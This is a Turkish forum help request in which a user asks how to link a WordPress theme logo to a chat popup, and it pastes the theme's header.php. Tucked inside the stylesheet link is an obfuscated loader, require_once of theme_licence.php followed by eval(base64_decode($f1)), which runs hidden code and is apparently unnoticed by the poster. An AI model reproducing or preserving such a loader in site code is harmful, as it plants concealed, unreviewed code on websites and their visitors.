Merhaba Arkadaşlar Php'den Fazla anlamıyor ve bir olay çözemedim logoya link veremiyorum.
header.php dosyamı size versem acaba logoya link verilmiş şekilde verirmisiniz..
logoya verilecek link
javascript:void%20window.open('http://www.chatchatlak.com/kpsohbet/Girelim.asp','','width=1010,height=700')header.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<meta name="description" content="blackvivi unique wordpress skin designed and coded by rkcorp" /><!-- edit -->
<meta name="keywords" content="custom wordpress skin, unique wordpress theme, dark wordpress skin, dark wordpress theme, black wordpress skin"/>
<meta name="coder" content="rkcorp" />
<title><?php bloginfo('name'); ?><?php wp_title(); ?></title>
<link rel="stylesheet" href="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://scott-m.net/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<?php wp_head(); ?>
</head>
<body>
<?php start_template(); ?>
<div id="wrapper">
<div id="container">
<div id="header">
<div class="header_tag">
<h1><a href="<?php echo get_settings('home'); ?>"><?php bloginfo('name'); ?></a></h1>
<p><?php bloginfo('description'); ?></p>
</div>
<div class="navigator">
<ul>
<li>
<?php wp_list_pages('title_li=&depth=1'); ?><a href="<?php echo get_settings('home'); ?>">Ana Sayfa</a></li>
</ul>
</div>
</div>